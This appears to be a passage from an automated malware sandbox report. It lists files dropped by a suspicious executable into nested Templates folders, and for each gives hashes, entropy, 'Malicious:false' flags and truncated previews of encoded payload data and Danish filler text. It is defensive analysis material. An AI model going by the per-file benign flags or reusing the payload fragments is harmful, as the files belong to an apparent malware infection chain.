                                                                                                                                                                                                                  • Filename: SephioneInstallerx64.exe, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: SephioneInstallerx64.exe, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: craig.exe, Detection: malicious, Browse
                                                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\oicgkvnekjmivsgoxokizzeblgyngayb

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..

                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Adown\Sonogram\Aristocratical\Coppice11.con

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):21803
                                                                                                                                                                                                                  Entropy (8bit):4.9383038764473834
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:pFUuUD34eHxVqII046Z+Lqv18gDtkXF7bFuHkyWxWkYY7l:HUxD1RXI0tMLqvHuXZMHZWmY7l
                                                                                                                                                                                                                  MD5:85CC2D5B36C9C45811901DC879424E83
                                                                                                                                                                                                                  SHA1:F7E9C8B480F9642F7C7BF78EECEC50D831E76A4F
                                                                                                                                                                                                                  SHA-256:908CCB30B856193065020AC5E16BC195B1BF2A46D9A314243BF84C9FF9596D1D
                                                                                                                                                                                                                  SHA-512:D1BC157ACA22182CF6432E3CBDCECD5CFDB7E91BC482DF7B17D2F09A0113A41B24128B1498C2358A594C404B557A114DC1E6F343B95824086A64058A4F3BE0A3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.2...................x....O..........-m...O._..../.................|....7.g.I....&...5./.=.....X........w......F........;.....................Y..............}@.....3.b....o......$(a;............s;..L.M...0...#.........<...7.h........'........F............1.......................B..6......M.........nCr..5...6........./*].N........;..Z:..Y.l.....s..C.........H.......k...b.._\"i..~............w...u......#.F..{..1...[...........\)..j.bA-......i..C.v]m.....^...m]..Y.........K.............Q.........]......'..I.p..8.$.......M...&...............)D.lE7...\e".3............O.......e.Ou.../.....6................F'...0.....................d..........*.=..\.............]...(dU(..y.v1......'..^.0...............A3...<"..(W..).3...PW..........D....D...@.........Y........ .......-.....[.`.s.G.$V...l.....F......n...<.............S3T.............#..............w.......\....6...4..a.A.l..jt.....!d.......c...f3........+...n.......!.;........-D...IXD.Q..5._.Tb............i8......Q.`.......,W....'

                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Adown\Sonogram\Aristocratical\Jyllandstur204.Hom

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (12052), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):12052
                                                                                                                                                                                                                  Entropy (8bit):2.7599176206155107
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:FU3FRIApfDOEvIuFF7oilGBx2kH5WBcb2Aes/KSJw9pgblDr:+HBBDTfjANH5Esz8a/
                                                                                                                                                                                                                  MD5:053B8C4406A7D68D3F81BC7797DAB180
                                                                                                                                                                                                                  SHA1:87E6B0D7F74B4F0715A0F458983C224B69FF7804
                                                                                                                                                                                                                  SHA-256:BD0C14B254FF36EFEADDF4AA111AD2F6D1E450E583E4806D10B93122D324C7B8
                                                                                                                                                                                                                  SHA-512:B25AA8C8A3BE36D81CC2043116E0CA9BCADA248C2149ADEEC4465712FE334F134F4AE0F758A1FD218D5D45AD80F1D42FEF8EB46F63F7C9C9C433730B09441685
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:000000000000C2AC3F9F84ED60D7E4B7359AE0B63489D8A8728497AD69C197B67ADD9E97FC9A08A3F29369DF8DE5199FD2BE2E88F1B63688F6F737CDC5EB7AC197B67ADDCFE76ADD87EF6ADD87F37A8497EF76CDC7FF6AC197B67AD99BFF33CD87A762DD9BFF33CD87F633C3C5EA7AA5FC9A08A3F29369DF8DE50C84C5AB2F8CDB9E3681D8BC728487F333CD84EE6AD481E769DF9BFF33CD87A769DD87EF76CDDEFF6A9583EF739D99AD6BA5FC9A08A3F29369DF8DE50988C3993381D28F3584D9AB3F9F9FB67A9F82F37A8497E76ADD97F37A8497EF768497EF738499AD69CD9797FC9A08A3F29369DF8DE50888D6BB1C84DBBA7284C5EA76CDDEFF28DC9BFF33CD84EE6AD481E769DF9BF533CD87F37A8497EF738499AD69A5C2AC3F9F84ED60D7F4BE3681E0B63489D8A80A9FD8BC0DC5DEAD6BCD9BB67ADD9BB67ADD9BFF33CD87F37A8497EF73A50000004C4C000000008A00004300535300002B2B2B2B0000000000A3002C2C00FFFFFFFF00FAFA0000002F2F0017004500480024000000000000ED0000000000001100004A00D200009D9D9D00D7D700DF000020202020202020200000000000333333330017007400F0F000007A7A7A7A0000A800004D0000007A00DFDFDF00DFDF001D00000018000000B90000B00000000000E7E7E7E7003A0000009900ECECECECEC0000E9E90000

                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Adown\Sonogram\Aristocratical\Vindmlleprojekterne.Fre

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):259545
                                                                                                                                                                                                                  Entropy (8bit):7.734845862532547
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6144:xMZRnbukFbmZUPA0PyR4XmODEgoBEKi8e6Rh7:xmnbuw3dmODkYBc
                                                                                                                                                                                                                  MD5:4EDDEE5CB2FB41A4BBC5497F0A202EB7
                                                                                                                                                                                                                  SHA1:35FBB895292DD8FA1BA5C8146079072522A107AB
                                                                                                                                                                                                                  SHA-256:4D100F225442773422ABE5D13F1A06F1FC39CF1FB895EDB7B6BB87057A1A778D
                                                                                                                                                                                                                  SHA-512:0E76FCF397C5947F9E70C685F50336809EB934C49513707F3C729ED76D8782D9998F21C47E5D2849F71CAFC05AEC076CF1F8879BAE69B90E6F33C7FD6275834D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:...S................///.................LLL.........CCC..........4..!..Y..;.QQ....LL......+.....................z.:::....................m.........b.........................................]...S...............2222........................?............................W......SSS..(...OOO....eeee...........&&.l.X.....#............CCCC..R............V......................._......sss.,..n........TTTT.....gg.....3.........****.<.......n....--................................vv.......n.z.......n.....|.............11......P..........Z.....NN.....oo.............//........O..............................................r.....................r....WW....`.bb.77...|...........VVV.uuuu.T.......}...$$.b.I........................................GGG................f..............ff..............+.....UU...NN..uq..f.......:!.f..................k..f...f...K...$3L..f=....Z.'..f.....j............D.9........h.........X.......;......f!...f...4...L..f!...aKxG.f.....-....f.....).f...!...h. .........N...nC

                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Adown\Sonogram\Aristocratical\Yemenitternes.txt

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):518
                                                                                                                                                                                                                  Entropy (8bit):4.2438612386567005
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:7ZLxphSHeKKtrz1oI+z1AObYAZ1wqFh87vQ:FNHS+KKtv1op6ObdwmCvQ
                                                                                                                                                                                                                  MD5:56DA579148B8B7B3DF75890CE348AAD9
                                                                                                                                                                                                                  SHA1:59C00C11AA27EE294AEEDFC8A202A30C8F9E7507
                                                                                                                                                                                                                  SHA-256:4082AA3989480E8FA1D8D41A910792B16CAB127428F408FB5E13311307885BC8
                                                                                                                                                                                                                  SHA-512:D33312CA365CB2BF7167066A93CC3A386BC9CF23119A73CBECC73A33EA1F07803E6B126CCDC3402963BCE10C56E8C5E17610A07D2C3ECC7D1A32CC01866BC5BE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:indfringerne skattesprgsmaalenes syphers,undersoegelse fremhaevede udkiksposters servicegarantierne kvder semidefiniteness grene..blattodea sunnier haabefuldt epitomising pedagogying daddelpalmer nonreservation misconstruction moruloid cundeamor biophor balletically..lastefuldt processers vrdiangivelsernes buriss sylfidens udlaaningers..afvrgepligts solidago tartralic unmeteorological frtidspensionbjr info aandlsheden kysk sekundaerprocesser hindbaermarmelade..vertikalerne tusinders hetoroseksualismen nabogrunde.

                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Adown\Sonogram\Aristocratical\alkylated.eft

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):43841
                                                                                                                                                                                                                  Entropy (8bit):4.9472939294514005
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:AUp0OKgF3sjLzb2ruj6i1hgFz6PDvBzooMnp+jz24E6j8:Jp6vvlj64SFz6rvBaEf24Ey8
                                                                                                                                                                                                                  MD5:6E5C3C8EF090D577425BD9EC8598752D
                                                                                                                                                                                                                  SHA1:A783B5F8BF48051DA517E36C441CAAE1B78572A0
                                                                                                                                                                                                                  SHA-256:0D79E0CD4594F72B327DA289AA1A7B4D168558D782D87946F1D05F99A6AA0E41
                                                                                                                                                                                                                  SHA-512:8E74A55145E78F6DC0EDA6893170F19D1C342AE9995BF2D50D3085F9BE98BF63C2DA377366751122A1A1AC21DAFF11E9F817F4C8A9C04D003D03B5C1B16E804D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.2...........).......,..ir.y........K................L.....[.X.].....n.M..........................I..{........g.......2R..................)..J.....,.{.,.,j.........4....H...........8W.....|n..K.......U............Y.5..........N..6...yY..k.g..........D.......v...L.,.........Q..........a.W....f.............g........%..+...Q.............*.........Z..2..........................r......%....._.q...........5.........".-....;.......G..i.........:......Y...L.......6.....\S....T...R.;......G.........#s..bU..O...Yp........A....e........z......p.<..b......`.E.E..*..,.%L......C...Hj3.....0.W....,.......h....>........4..?e/#.....D.......'...........I6..F.....v...A.7..q.......}...y...S..(...6h............n....o..<....V^......@..!.e.L}.j.+.......%.<O._*v.......}.[...f...............X...}).u...............V.....X.A..r.......M....N...........~....[..39.............|..L.0......4...I.......Z..........,....\.../...7......h.,..D....Q.>.ra...5............................M.O....q.......+...:.`~

                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Adown\Sonogram\Aristocratical\engirds.pos

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):81034
                                                                                                                                                                                                                  Entropy (8bit):4.966143280042011
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:Apxmt8uUrqYQTMr26//8+hfbTP/5pfl05jyLnmtunGekfB:8Q89qT4rx/8+VnXXKQLn4LPfB
                                                                                                                                                                                                                  MD5:1885357A0D5DBDD84B8EC1E4AAE019C6
                                                                                                                                                                                                                  SHA1:8063A464852157BC3ACD0F410D9340DABF5FFCD5
                                                                                                                                                                                                                  SHA-256:8027D2A2F30EBE6F8238A84A76A61F1F5504C6CF9F111AD0FB639355847EFC33
                                                                                                                                                                                                                  SHA-512:9AD20E2CFE9C24232CC1222FEF738FCF5BC83077BEA64DB395ABF1CA768F8DFC89E15D4184008E0A403BA775DB2AEE0571FCB83658BF6D73FD1BDF5995BF9DEB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......,.v.....l..a....). ...G.\.....)...]....g...1X......S......%....6...*............2.......-.....;............{Z...r........4..O1........t.....%...:...n......{..]....z...i.................4....r......q......1.ml.@.R.................A............n......Z.p...+.............-..............v...........yE...S...@*..jh....%..#'.....I........2.......Q..d.....3..............x.......E.....V..D(.............[...K.......'..........j....U.9..&.r..9Px........P.-......8....A..............,......X...........y.........g.._Gb2...Y]............J..P....]#....T.L4.5...........L./.............2..i...........]..................M.{..)y..;V....:E.>..:......icM..>..........8..a........]O9..a.........et..(.....x@........r.........."..J....?..k.........A...W.\....F.@.6.........Bo....t..#..2.... ...0n.j.y....1...........D..........SN.b..........z.}...n...]......C.....K....|E.................Q..3F......h...Z......k..............e..w...:......................(...w........7W.....#.......l..J..Wh...3..Is

                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tilvirkninger\Jvndgns\lhegnets.paa

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5772
                                                                                                                                                                                                                  Entropy (8bit):5.0190422599771916
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:l7N6//NAW/UyIMf8ozTEg60Pn9sRWwdWudZvsyoB//jI8tFe+L4V+7QY:lZANAJaf8w00VWWwdWudBsfBDvtFbe+H
                                                                                                                                                                                                                  MD5:6E7B32029BC6B2939D3DB26CFB356D0A
                                                                                                                                                                                                                  SHA1:058C4830759F6A0765FDDE01A9BB8EDB49E6FCC8
                                                                                                                                                                                                                  SHA-256:22A733CFC276620E89DDC62817CD5BE8CF0878B39E6428B8F492B27CB0493D5A
                                                                                                                                                                                                                  SHA-512:9CB878B6A42BB5B5D927764E0C17310C1D96AEAE79B411C3EDC5C26E7F08D8A2483152FB46A1083AC163D5D0DC1342A932616E8F8F57338957A7C33FAD6E22DF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:KD...<t[..s........1.2{..g...I........@.!.....N.....l.f...Q..b..U..... .C.w..q...;.....4.........D.F-Y..b..!L....... ....O.... ....*..K...?..N.........7S...~...F.............C...(.K..F....$..p...(..........M........X.Z.J.......J..C..........7....De..........M....?...F........y.............b2.....e.7.......,.D..N.x...?D.....'Y`......pZ...........6..L..4..M....g.....3..........d.........rM=.B..,.L........k.......W.........t.....................7...........|........./..'b.....f..s....#.hc....F...[............}.6D.........L:......D...............&...........e...z.E..B'./..i..E..........G.........O..q...........-........&...$........3...............-......6................c..d...x......................Ta.m.p."........z.4..[...l...........I.y....I.....yr.............L..4*.3....................I..:................)....i.......O.5d................C.u...L.........n...7......R............T.,.....`..................I.........>...z.z..7s..."*....... ....Yp.....................7..k

                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tilvirkninger\Jvndgns\slotsaftappet.gen

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):6559
                                                                                                                                                                                                                  Entropy (8bit):4.921661324722055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:akWOmmtj+X1R/KrjMbP1K3F+m9V5YIR2A7nVc/YJ0wu43AjdgHyp57rQE:abODkFNwsqYIR2anVc/Y64wVp5rQE
                                                                                                                                                                                                                  MD5:CD2B020F955E136B859D4D73544F295E
                                                                                                                                                                                                                  SHA1:10CB6A1A901E87493B4F9B84B5E9AF3CF6638E93
                                                                                                                                                                                                                  SHA-256:9722ACF73CF6726F2559DC59FF3C10395F03AE63844D85C9465765B07B42E912
                                                                                                                                                                                                                  SHA-512:8238980FE0A953B2FD02AE3E1CAB2130C69A971BD8600AD88AA350D2BEBA21657E5350537C5F129D0E9936D9FC25462F9A0A068C95096743C70BD0E269DA37BC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:P.....@...............{...........d..N^.w..T"....;6..l.......e...K.........w.......f.N........0T..T.}.'.............Y..........a..........4.F...D..:.p...N.].G....}.....+....c.......r...H/{|................m..'.....[#......v..M....Z.......!.......]...............=..$J)...'......J...q.....R-......5Oy..e................S.........!L^......................j........i.........I.J..}...7.......k.5..h..........v.C....)9...................=............`..Z..e....b....................;.......m..\..B.m.7....C$........p.....KJt............J...V..............................,....O......3.....k........X....?.................G...;...H...$..........Y...........m.....................Pe.9....:...........k....2(........2...L...........................M...~.S......B6...........z........).J..l............A......]q....G..^F...7....j...........iD.......=...(...n........4.......o...V.....9....4..............q........._.T....T.......@F.k...........2........o...w......;.................u.....D^{.......

                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tilvirkninger\Jvndgns\uforanderligheden.mia

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):9024
                                                                                                                                                                                                                  Entropy (8bit):4.915362970792497
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:nbskfPxqJalVbEEuR/9WTZcs+JjwB6FLEF:h44lVbED1MZEjbU
                                                                                                                                                                                                                  MD5:98BCC29584ED7524EE0492F24B14615D
                                                                                                                                                                                                                  SHA1:6493DBB937D31911C82A8D39B553891D8B0A49BD
                                                                                                                                                                                                                  SHA-256:39C72F185A55457B25BEC67A88BAE7FDBCCEE4880AA8F8D132FBC9DEB3D547BE
                                                                                                                                                                                                                  SHA-512:8C1A3121923FCE3B588B68F917F2B14BBD5B098434111CFDEBE47D17DF84E377AA2328F5E3F5C1712FCE65682E1A37160A3BEA7789A6205A6BFAB6F8227B9DF3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:t..................U......Hr.....%.K.........t...K............o..............I..)..Y}..~(...........|..B....]..z.Z.g..bz.........4M..c.......=%.......3.......................h...)...J.g..e.Ia...................*..~.....I....\ZB.(.N..@...G.....-.8.e....2..Tx........Z...>2..........C.\\L......s....R.d[RA.............W.....N.......?.....#.YQ........~...H.].f=<."e.....Q...........2...|...........Z..`.....*...O..u....Z....D...............{. ..B..;. ...(...Q..............'..5....a...X..K..........$t.............M.....g.....h..../..i....Z...q.....H.O4.]...pU.!......\...<....K..:K..............n.....Za..s.r..........,.......m......r.....(........L........3.....H.j......32. ).A...@...O....N.......T.....O...>.......................`..Q.....a.........v...;...U..S.....6b............0N.3............g..04..&.....)..........^...k..................K......a..m2q...s.X....O.........&^.....r..r.D..f.,.y....;....._..&... {.......!..y.............:...........?WihX4.....C.......2/..............O.

                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tilvirkninger\Jvndgns\ununderstood.per

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):39320
                                                                                                                                                                                                                  Entropy (8bit):4.944998067109953
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:m0jW1kE+iOvfiB0MmQW8ySRbgWKmj3zLJVDvKOu4gLZ77l3IFN:m0OkhyB0fS7KmDZVDCF4gtFaN
                                                                                                                                                                                                                  MD5:D1BF712E659E946D9EF4FC4CCEF11819
                                                                                                                                                                                                                  SHA1:50817BAD8D0F4FF70330FA3B0B0391E7686DBB8B
                                                                                                                                                                                                                  SHA-256:7BB763ED1B34F080F73FDC632C65DB5B1D261B0CBCC9B6BB79E5C14297641867
                                                                                                                                                                                                                  SHA-512:FE47F385330B3C71B345A584BBEF83783D060902B7677652763CF07A6A0FF69C5B84DD6E6B34316E72907966427DA317A852606F18999C4A3238EC382CA4C3A1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.(Xx....&..._......................a.E....6....S......................-..~xT.....6...............H%\......).......o..6r......B........UN......Y.:s........O..tE...._..........U`._y......J.6w........Q.....C..9.^....................~....gj.......\.........\Q............L..............H...9.............g..@.8...........>..b.......[........f....W..8...........n...E.....i.v...................=.5..................6.}...............r....|.B....0...........<....u.....\]..........N..T..6..)J.........1..J....$...................;...........Q.f.G?S..hq......D..8hK....x......D........Id....=..=.............;....-...z.......Mh...?...3...!............!.4~..y.....]0..........I.......*k...,p................r.7...x..Q........X........H...p?.............n..i.....i.....B..........O.|..............g....1..."`..?..2.~.........}.........f....#.............>P.!..F......+P......CR........\..'<..T....k...QH.....<.@.4.f.....XI..?...........c......;...>.s.?...W.....Y..........?.........L.1.....X.

                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tilvirkninger\Jvndgns\vksthormon.vie

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):81365
                                                                                                                                                                                                                  Entropy (8bit):4.951136235241379
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:BaPvst6NTHD+DH47qfrEvzKttGqNSgebjKHgMi8A2ATSUKp7eqG+6i:E8Ye4+f4vzqpebu5i8AtSUKpV
                                                                                                                                                                                                                  MD5:A3D650A87CFE589DBFB12A51A1226811
                                                                                                                                                                                                                  SHA1:453F4D898624E8C77D809556E5AB105BF5B7EDCE
                                                                                                                                                                                                                  SHA-256:24EA41D6C195676CEC5A05703291A266257AE168E85B8FDD9E3E855A9B6AD046
                                                                                                                                                                                                                  SHA-512:C2B1EB46FCE3BB9F2E48F3202D6AF249E214649E2DFC052AC0CE505825757D21D85CB652AD62826FC3FCB48D7785AE5D85152DFBDA98F0D5B25B8DEA8BF61A9A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..........:..L...=...x....|......k..a.hI..........Z.N.......!............_..G.T.5S.....k.+.TK......&.........k...>.k....[.....$@......Ek$N......9..~...7.........G........e.....S......................O.^.j.'.......\%H....n.......v<..$Cd....w...f......*.......N....H.d........8..j.....Q.T...]...J..1......0..J..5[H...T..m|..E...:.....J3.....................X....5............2.....g.....b....Q...............'......_..f....-..5..|pn..@.........M.........%.L.....Zjj.....D....q6~.4....&V........c............k....:.............^.]...........\..}.........b..P.!j.,5.8.G.U.n.................!j......`......l..lL........[^..............m....k.#........Z{.......T...7.0n....d.$..U................1...........l..C....f.....O. ....E8Q.......................;.z.....i<U....."...9..........]....%..#.....+......B6...................l.K.........F.....K........R.....5................0.......j....~.^......h.....@......s....N.o.F....$.l....F.....................L.).........w7....y... ...............w

                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\internaternes.sen

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):33151
                                                                                                                                                                                                                  Entropy (8bit):4.95016969568472
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:zJN995ttMvQQ5pVqLfRfSuIyZzcZCTBnBL9g:znz6oQ5pCfdzZACTm
                                                                                                                                                                                                                  MD5:523A2EAE6FED93FAD641378D499CFB13
                                                                                                                                                                                                                  SHA1:DEDB859E9ADC44A7BA6CF9AE1A8B120A5971E1DF
                                                                                                                                                                                                                  SHA-256:6DA59EA00AF0C268B12F2EB1077DC1229D8336A60AE3DF64D2631170EEDF361F
                                                                                                                                                                                                                  SHA-512:C5E9C6FD1758372506862E1FC15908B38C1B43E201DE29268D558724F247765B4740D0B3FAF1072C89497C958207E7711C25364AFCEC42D94B1D482E3FE8AF62
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.......`..p6...A......i..^...d...7........v.r.......L.......b.7.....6.\..G....C...H..J.....U.......nO.........%.OW..p..........+....'..6.[..I............K.......6..N.........Y.............H...V...v.2...>..o.z.....V*........I......S..A.........+_.t!........W......&....5j....3....;.`..........0:f...[..D. ?..N....^..o..E...Kfb..~`......og......m.\..... .)..........v...........o......~.E......H.....s..'.......@.....ic.T..J)..z................{......~..lk.{.......;.......W....r...:.."._s............r.....o(..+u......0....8..../,$."....~........c.......`.MF.........b...j....F.........t....L......Q....................'......P. ....a....l.....*.)..S.;Z.......j........G.M.....\.<$.............4.D.................f.#o.a...6U......P`.....b..c=r....k.?...mf..-.L.&.^.....Q.W......v.R..>.....j......=...W.i...~.....`...I.%................Q...........*..t.c-.......\.........+......[Z....|@....+.......[..I..4u......>..(".@..vD..............j.............=.....=..:.J\..`...."?...........6...

                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\kalkvrksarbejderens.jdi

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):60936
                                                                                                                                                                                                                  Entropy (8bit):4.941570218027665
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:klZbNthMxOfJDEhKk7ZcwYZdCZCEyu+IR9UOXCiNWuB7PiUijMAXj0kkOSsfh0H/:cbNthMeY5KPZddZubPUOyGOjMy9ZCM2Z
                                                                                                                                                                                                                  MD5:68CA93776C32C0E64B548D8DBD644F53
                                                                                                                                                                                                                  SHA1:31A5168074A7E51333EBF1D3DE639BE217F67090
                                                                                                                                                                                                                  SHA-256:BD45F54B75BED5EA8F7975F8C3A56CB2F491AAFE456889E206A1EC114458E688
                                                                                                                                                                                                                  SHA-512:37F4392783956A78F4D58F729BC3D439A3CC750880EFD0D9C3462416AFA6624898B6365A85824285A08CE827F74AA4D5C499136A1E5DCC6ABD08D0BA72AAA056
                                                                                                                                                                                                                  Malicious:false
